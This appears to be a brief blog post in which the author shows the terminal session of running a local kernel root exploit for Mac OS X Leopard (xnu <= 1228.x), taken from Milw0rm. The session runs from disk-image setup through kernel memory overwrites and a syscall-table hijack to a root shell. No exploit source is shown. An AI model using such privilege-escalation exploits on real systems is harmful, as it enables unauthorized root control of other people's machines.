HFS-fcntl Local Kernel Root exploit on Mac OS X (XNU)

I think am using latest and fully patched of OSX (Leopard), but exploit still work. Cool.

Jasmine:~ Cyberheb$ ./spl0it.sh
Apple MACOS X xnu <= 1228.x local kernel root exploit
 by: 
 http://www.digit-labs.org/ -- Digit-Labs 2008!@

* creating diskimage... done
* attaching/mounting diskimage... done
* executing exploit...

Apple MACOS X xnu <= 1228.x local kernel root exploit
by: 
http://www.digit-labs.org/ -- Digit-Labs 2008!@$!

* getattrlist...done
** attrlist length: 36
** fndrinfo:
* done

* setattrlist...done
* overwriting @0x0050A70C
* done

* setattrlist...done
* overwriting @0x0050A998
** sysent[21].sy_call: 0x0050A70C
* done

* jumping...done

* getuid(): 0
+Wh00t

bash-3.2# id
uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff),101(com.apple.sharepoint.group.1)
bash-3.2# uname -a
Darwin Jasmine.local 9.6.0 Darwin Kernel Version 9.6.0: Mon Nov 24 17:37:00 PST 2008; root:xnu-1228.9.59~1/RELEASE_I386 i386

Exploit is taken from Milw0rm. Thanks to super_temon for showing me ’bout this.

Advertisements

2 thoughts on “HFS-fcntl Local Kernel Root exploit on Mac OS X (XNU)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s